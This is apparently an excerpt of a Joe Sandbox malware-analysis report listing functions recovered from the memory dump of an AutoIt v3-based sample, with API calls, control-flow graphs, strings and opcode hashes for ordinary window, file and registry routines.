                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2189390790-0
                                                                                                                                                • Opcode ID: c3ee4b571c53519d48993cfcf41eea7a9e01bc77899d1214d976597debf0e2da
                                                                                                                                                • Instruction ID: a206443a3d4ab2e7828e1aaf01771210fd04037baf12e35386840df738cda6ca
                                                                                                                                                • Opcode Fuzzy Hash: c3ee4b571c53519d48993cfcf41eea7a9e01bc77899d1214d976597debf0e2da
                                                                                                                                                • Instruction Fuzzy Hash: 4B42F430628742DFD729CF24C888BAAB7E4BF55304F14455DE4968B291D7B4E8E8CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetSysColorBrush.USER32 ref: 00212D07
                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00212D31
                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00212D42
                                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00212D5F
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00212D6F
                                                                                                                                                • LoadIconW.USER32 ref: 00212D85
                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00212D94
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                • Opcode ID: 24a3af4d6f0f9da16408cfe15e6fdc7eec3952081f5bd4802dc2bcbca6a7b1a9
                                                                                                                                                • Instruction ID: 5823bec68cf755554668ad8dc071430e82fff3e1ff8f9d91a4fc792db9fcca21
                                                                                                                                                • Opcode Fuzzy Hash: 24a3af4d6f0f9da16408cfe15e6fdc7eec3952081f5bd4802dc2bcbca6a7b1a9
                                                                                                                                                • Instruction Fuzzy Hash: C421B4B5951258AFDB00DFA4FC89BDDBBB8FB09700F10412AE511AA2A0DBB545548F91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 301 248d45-248d55 302 248d57-248d6a call 23f2c6 call 23f2d9 301->302 303 248d6f-248d71 301->303 319 2490f1 302->319 305 248d77-248d7d 303->305 306 2490d9-2490e6 call 23f2c6 call 23f2d9 303->306 305->306 309 248d83-248dae 305->309 324 2490ec call 2427ec 306->324 309->306 312 248db4-248dbd 309->312 315 248dd7-248dd9 312->315 316 248dbf-248dd2 call 23f2c6 call 23f2d9 312->316 317 2490d5-2490d7 315->317 318 248ddf-248de3 315->318 316->324 323 2490f4-2490f9 317->323 318->317 322 248de9-248ded 318->322 319->323 322->316 327 248def-248e06 322->327 324->319 330 248e23-248e2c 327->330 331 248e08-248e0b 327->331 334 248e2e-248e45 call 23f2c6 call 23f2d9 call 2427ec 330->334 335 248e4a-248e54 330->335 332 248e15-248e1e 331->332 333 248e0d-248e13 331->333 338 248ebf-248ed9 332->338 333->332 333->334 363 24900c 334->363 336 248e56-248e58 335->336 337 248e5b-248e79 call 243820 call 2429c8 * 2 335->337 336->337 371 248e96-248ebc call 249424 337->371 372 248e7b-248e91 call 23f2d9 call 23f2c6 337->372 340 248fad-248fb6 call 24f89b 338->340 341 248edf-248eef 338->341 354 248fb8-248fca 340->354 355 249029 340->355 341->340 344 248ef5-248ef7 341->344 344->340 348 248efd-248f23 344->348 348->340 352 248f29-248f3c 348->352 352->340 359 248f3e-248f40 352->359 354->355 357 248fcc-248fdb GetConsoleMode 354->357 361 24902d-249045 ReadFile 355->361 357->355 362 248fdd-248fe1 357->362 359->340 364 248f42-248f6d 359->364 366 249047-24904d 361->366 367 2490a1-2490ac GetLastError 361->367 362->361 368 248fe3-248ffd ReadConsoleW 362->368 369 24900f-249019 call 2429c8 363->369 364->340 370 248f6f-248f82 364->370 366->367 375 24904f 366->375 373 2490c5-2490c8 367->373 374 2490ae-2490c0 call 23f2d9 call 23f2c6 367->374 378 24901e-249027 368->378 379 248fff GetLastError 368->379 369->323 370->340 383 248f84-248f86 370->383 371->338 372->363 380 249005-24900b call 23f2a3 373->380 381 2490ce-2490d0 373->381 374->363 377 249052-249064 375->377 377->369 388 249066-24906a 377->388 378->377 379->380 380->363 381->369 383->340 391 248f88-248fa8 383->391 394 249083-24908e 388->394 395 24906c-24907c call 248a61 388->395 391->340 400 249090 call 248bb1 394->400 401 24909a-24909f call 2488a1 394->401 406 24907f-249081 395->406 407 249095-249098 400->407 401->407 406->369 407->406
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .#
                                                                                                                                                • API String ID: 0-197210044
                                                                                                                                                • Opcode ID: 6daee3ab1577046091fa0903c978da530885ed3ee060dc90a402784c5e251f4e
                                                                                                                                                • Instruction ID: 84d275f23f04297cff4e112efcc1bb86661948abcfe6574703031cb7e518a98c
                                                                                                                                                • Opcode Fuzzy Hash: 6daee3ab1577046091fa0903c978da530885ed3ee060dc90a402784c5e251f4e
                                                                                                                                                • Instruction Fuzzy Hash: A3C10874D24249DFDF19DFA8D885BAEBBB0AF09310F144195F814AB392CB7089A1CF61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 409 25065b-25068b call 25042f 412 2506a6-2506b2 call 245221 409->412 413 25068d-250698 call 23f2c6 409->413 419 2506b4-2506c9 call 23f2c6 call 23f2d9 412->419 420 2506cb-250714 call 25039a 412->420 418 25069a-2506a1 call 23f2d9 413->418 429 25097d-250983 418->429 419->418 427 250716-25071f 420->427 428 250781-25078a GetFileType 420->428 431 250756-25077c GetLastError call 23f2a3 427->431 432 250721-250725 427->432 433 2507d3-2507d6 428->433 434 25078c-2507bd GetLastError call 23f2a3 CloseHandle 428->434 431->418 432->431 438 250727-250754 call 25039a 432->438 436 2507df-2507e5 433->436 437 2507d8-2507dd 433->437 434->418 448 2507c3-2507ce call 23f2d9 434->448 441 2507e9-250837 call 24516a 436->441 442 2507e7 436->442 437->441 438->428 438->431 451 250847-25086b call 25014d 441->451 452 250839-250845 call 2505ab 441->452 442->441 448->418 459 25086d 451->459 460 25087e-2508c1 451->460 452->451 458 25086f-250879 call 2486ae 452->458 458->429 459->458 461 2508c3-2508c7 460->461 462 2508e2-2508f0 460->462 461->462 465 2508c9-2508dd 461->465 466 2508f6-2508fa 462->466 467 25097b 462->467 465->462 466->467 468 2508fc-25092f CloseHandle call 25039a 466->468 467->429 471 250931-25095d GetLastError call 23f2a3 call 245333 468->471 472 250963-250977 468->472 471->472 472->467
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0025039A: CreateFileW.KERNEL32(00000000,00000000,?,00250704,?,?,00000000), ref: 002503B7
                                                                                                                                                • GetLastError.KERNEL32 ref: 0025076F
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00250776
                                                                                                                                                • GetFileType.KERNEL32 ref: 00250782
                                                                                                                                                • GetLastError.KERNEL32 ref: 0025078C
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00250795
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002507B5
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 002508FF
                                                                                                                                                • GetLastError.KERNEL32 ref: 00250931
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00250938
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                • String ID: H
                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                • Opcode ID: 2a0e1a1ecbbe2bf190547002b9d1cdd371920f28310cb10ee78ac247e6450a24
                                                                                                                                                • Instruction ID: 136cc8579d319c3c2704e33a553655abfc9a2bcdab72d88c5a02bbb4b61934fa
                                                                                                                                                • Opcode Fuzzy Hash: 2a0e1a1ecbbe2bf190547002b9d1cdd371920f28310cb10ee78ac247e6450a24
                                                                                                                                                • Instruction Fuzzy Hash: 73A15732A201058FDF19AF68ECD5BAE7BA0AB06321F140159FC159F391CB309C27CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00213A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002E1418,?,00212E7F,?,?,?,00000000), ref: 00213A78
                                                                                                                                                  • Part of subcall function 00213357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00213379
                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 0021356A
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0025318D
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 002531CE
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00253210
                                                                                                                                                • _wcslen.LIBCMT ref: 00253277
                                                                                                                                                • _wcslen.LIBCMT ref: 00253286
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                • API String ID: 98802146-2727554177
                                                                                                                                                • Opcode ID: 2b00b51c54e40bec83f4ac84b877c31502127023776e89d71881f0829a7b444a
                                                                                                                                                • Instruction ID: 44921d6cc36a0688bde9f6072997bca40cfc4684e654de199ecbc8b724ecdc79
                                                                                                                                                • Opcode Fuzzy Hash: 2b00b51c54e40bec83f4ac84b877c31502127023776e89d71881f0829a7b444a
                                                                                                                                                • Instruction Fuzzy Hash: 03717C71464341DEC314EF65EC869ABBBE8FF95340F40046EF94697160EB709A98CFA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetSysColorBrush.USER32 ref: 00212B8E
                                                                                                                                                • LoadCursorW.USER32 ref: 00212B9D
                                                                                                                                                • LoadIconW.USER32 ref: 00212BB3
                                                                                                                                                • LoadIconW.USER32 ref: 00212BC5
                                                                                                                                                • LoadIconW.USER32 ref: 00212BD7
                                                                                                                                                • LoadImageW.USER32 ref: 00212BEF
                                                                                                                                                • RegisterClassExW.USER32(?), ref: 00212C40
                                                                                                                                                  • Part of subcall function 00212CD4: GetSysColorBrush.USER32 ref: 00212D07
                                                                                                                                                  • Part of subcall function 00212CD4: RegisterClassExW.USER32(00000030), ref: 00212D31
                                                                                                                                                  • Part of subcall function 00212CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00212D42
                                                                                                                                                  • Part of subcall function 00212CD4: InitCommonControlsEx.COMCTL32(?), ref: 00212D5F
                                                                                                                                                  • Part of subcall function 00212CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00212D6F
                                                                                                                                                  • Part of subcall function 00212CD4: LoadIconW.USER32 ref: 00212D85
                                                                                                                                                  • Part of subcall function 00212CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00212D94
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                • Opcode ID: 387310914000a3554992066173608bf09ce5dbba6a35befa13b671e4a6694a63
                                                                                                                                                • Instruction ID: 22a79f6a61331cee4103f334d4b4d8cc9e728f7cded628fd2b947214ff8bbf1b
                                                                                                                                                • Opcode Fuzzy Hash: 387310914000a3554992066173608bf09ce5dbba6a35befa13b671e4a6694a63
                                                                                                                                                • Instruction Fuzzy Hash: 0E210C75E90354ABDB109F95FC9DAADBFB4FB48B50F1000AAE500AA6A0D7B11560CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0021BB4E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                • String ID: p#.$p#.$p#.$p#.$p%.$p%.$x#.$x#.
                                                                                                                                                • API String ID: 1385522511-553131232
                                                                                                                                                • Opcode ID: 37ca03392d2676557315c7d4a766524b77f5009a6d2b4e93db6745e9796e31d7
                                                                                                                                                • Instruction ID: 9c2eced1087439aa04d1dcf425edf01286cea40e6f6c3352e78354fa2a5873a7
                                                                                                                                                • Opcode Fuzzy Hash: 37ca03392d2676557315c7d4a766524b77f5009a6d2b4e93db6745e9796e31d7
                                                                                                                                                • Instruction Fuzzy Hash: 8C32CF34A2020ADFDB15CF54C894ABEB7F9EF54304F148099E906AB291C7B4ADE1DF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 757 213170-213185 758 2131e5-2131e7 757->758 759 213187-21318a 757->759 758->759 760 2131e9 758->760 761 2131eb 759->761 762 21318c-213193 759->762 763 2131d0-2131d8 DefWindowProcW 760->763 764 2131f1-2131f6 761->764 765 252dfb-252e23 call 2118e2 call 22e499 761->765 766 213265-21326d PostQuitMessage 762->766 767 213199-21319e 762->767 768 2131de-2131e4 763->768 770 2131f8-2131fb 764->770 771 21321d-213244 SetTimer RegisterWindowMessageW 764->771 803 252e28-252e2f 765->803 769 213219-21321b 766->769 773 2131a4-2131a8 767->773 774 252e7c-252e90 call 27bf30 767->774 769->768 775 213201-213214 KillTimer call 2130f2 call 213c50 770->775 776 252d9c-252d9f 770->776 771->769 778 213246-213251 CreatePopupMenu 771->778 779 252e68-252e77 call 27c161 773->779 780 2131ae-2131b3 773->780 774->769 798 252e96 774->798 775->769 782 252dd7-252df6 MoveWindow 776->782 783 252da1-252da5 776->783 778->769 779->769 787 252e4d-252e54 780->787 788 2131b9-2131be 780->788 782->769 790 252da7-252daa 783->790 791 252dc6-252dd2 SetFocus 783->791 787->763 792 252e5a-252e63 call 270ad7 787->792 796 213253-213263 call 21326f 788->796 797 2131c4-2131ca 788->797 790->797 799 252db0-252dc1 call 2118e2 790->799 791->769 792->763 796->769 797->763 797->803 798->763 799->769 803->763 804 252e35-252e48 call 2130f2 call 213837 803->804 804->763
                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0021316A,?,?), ref: 002131D8
                                                                                                                                                • KillTimer.USER32 ref: 00213204
                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00213227
                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0021316A,?,?), ref: 00213232
                                                                                                                                                • CreatePopupMenu.USER32 ref: 00213246
                                                                                                                                                • PostQuitMessage.USER32 ref: 00213267
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                • Opcode ID: 5e3ef98de3085ac8729d732491333de7cf840dff26f4cf12707f9bffdc3ac9d9
                                                                                                                                                • Instruction ID: 583b74827b2b6ab0e39cb760329395792c70764ff370d0d7a9a71e6593739b5d
                                                                                                                                                • Opcode Fuzzy Hash: 5e3ef98de3085ac8729d732491333de7cf840dff26f4cf12707f9bffdc3ac9d9
                                                                                                                                                • Instruction Fuzzy Hash: D04118312B0245A7DB15AF78AC4DBF936DAE726340F140135F906852E1CBB19EF49BA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: D%.$D%.$D%.$D%.$D%.D%.$Variable must be of type 'Object'.
                                                                                                                                                • API String ID: 0-516259185
                                                                                                                                                • Opcode ID: 890a40a0cb94bed08933b566cbab7a249aaf077ff7b0324cdb6855212708fb69
                                                                                                                                                • Instruction ID: 0277919ffbe1eb00db7207ea12a99654a97a59d9d218416e877d2800cdeefa62
                                                                                                                                                • Opcode Fuzzy Hash: 890a40a0cb94bed08933b566cbab7a249aaf077ff7b0324cdb6855212708fb69
                                                                                                                                                • Instruction Fuzzy Hash: 65C27D71A20215DFCF14CF58D880AADB7F1BF28310F258169ED16AB291D375EDA1CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1333 212c63-212cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                • Opcode ID: be5c15d4343972d6f7f5d2a026ab279b493098584cd8e405c86a37ed04497b8a
                                                                                                                                                • Instruction ID: 0515c94cba2769057f4efad9c8dae9e3b6ff773fb6c8cca9fae3f403127e53d2
                                                                                                                                                • Opcode Fuzzy Hash: be5c15d4343972d6f7f5d2a026ab279b493098584cd8e405c86a37ed04497b8a
                                                                                                                                                • Instruction Fuzzy Hash: 31F0DA755802D07BEB311717BC8CE776FBDD7C7F50B1000AAF900AA5A0C6711861DAB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1334 2461fe-246217 1335 24622d-246232 1334->1335 1336 246219-246229 call 24fe21 1334->1336 1338 246234-24623c 1335->1338 1339 24623f-246263 MultiByteToWideChar 1335->1339 1336->1335 1343 24622b 1336->1343 1338->1339 1341 2463f6-246409 call 230a8c 1339->1341 1342 246269-246275 1339->1342 1344 246277-246288 1342->1344 1345 2462c9 1342->1345 1343->1335 1348 2462a7-2462b8 call 243820 1344->1348 1349 24628a-246299 call 252040 1344->1349 1347 2462cb-2462cd 1345->1347 1351 2462d3-2462e6 MultiByteToWideChar 1347->1351 1352 2463eb 1347->1352 1348->1352 1362 2462be 1348->1362 1349->1352 1361 24629f-2462a5 1349->1361 1351->1352 1355 2462ec-2462fe call 243467 1351->1355 1356 2463ed-2463f4 call 241537 1352->1356 1364 246303-246307 1355->1364 1356->1341 1363 2462c4-2462c7 1361->1363 1362->1363 1363->1347 1364->1352 1366 24630d-246314 1364->1366 1367 246316-24631b 1366->1367 1368 24634e-24635a 1366->1368 1367->1356 1369 246321-246323 1367->1369 1370 2463a6 1368->1370 1371 24635c-24636d 1368->1371 1369->1352 1374 246329-246343 call 243467 1369->1374 1375 2463a8-2463aa 1370->1375 1372 24636f-24637e call 252040 1371->1372 1373 246388-246399 call 243820 1371->1373 1379 2463e4-2463ea call 241537 1372->1379 1386 246380-246386 1372->1386 1373->1379 1388 24639b 1373->1388 1374->1356 1389 246349 1374->1389 1375->1379 1380 2463ac-2463c5 call 243467 1375->1380 1379->1352 1380->1379 1392 2463c7-2463ce 1380->1392 1391 2463a1-2463a4 1386->1391 1388->1391 1389->1352 1391->1375 1393 2463d0-2463d1 1392->1393 1394 24640a-246410 1392->1394 1395 2463d2-2463e2 WideCharToMultiByte 1393->1395 1394->1395 1395->1379 1396 246412-246419 call 241537 1395->1396 1396->1356
                                                                                                                                                APIs
